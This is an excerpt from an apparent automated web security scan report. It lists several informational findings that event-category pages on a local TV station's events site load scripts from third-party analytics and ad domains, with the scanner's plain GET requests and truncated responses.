Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:33:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 122
ETag: "e64eb3779348fa22044f1248e60f06fc"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:33:25 GMT; HttpOnly
Content-Length: 18216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.146. http://events.cbs6albany.com/albany-ny/events/comedy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/comedy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/comedy HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:34:41 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 859
ETag: "2394ab0f35b96be738c0e3f80b223242"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:34:41 GMT; HttpOnly
Content-Length: 33111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.147. http://events.cbs6albany.com/albany-ny/events/community

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/community

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/community HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:33:26 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 701
ETag: "5ec26f1ef331051cb41347e2c23296ae"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:33:26 GMT; HttpOnly
Content-Length: 30428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.148. http://events.cbs6albany.com/albany-ny/events/dance

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/dance

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/dance HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:33:43 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 656
ETag: "10c40bc28d8e8b5375ba960a51be0502"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:33:43 GMT; HttpOnly
Content-Length: 28008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.149. http://events.cbs6albany.com/albany-ny/events/education+campus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/education+campus

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/education+campus HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:35:35 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 375
ETag: "15db376f820c1479e20ba4e23a16ab4d"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:35:35 GMT; HttpOnly
Content-Length: 21469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.150. http://events.cbs6albany.com/albany-ny/events/fairs+festivals

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/fairs+festivals

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/fairs+festivals HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:33:46 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 682
ETag: "a4a64c656b1d94c656fc75ae37014a9e"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:33:46 GMT; HttpOnly
Content-Length: 23978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.151. http://events.cbs6albany.com/albany-ny/events/food+dining

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/food+dining

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/food+dining HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:33:49 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 654
ETag: "fc50c9affd6f001858738f4af50a05b9"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:33:49 GMT; HttpOnly
Content-Length: 27259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.152. http://events.cbs6albany.com/albany-ny/events/music

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/music

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/music HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
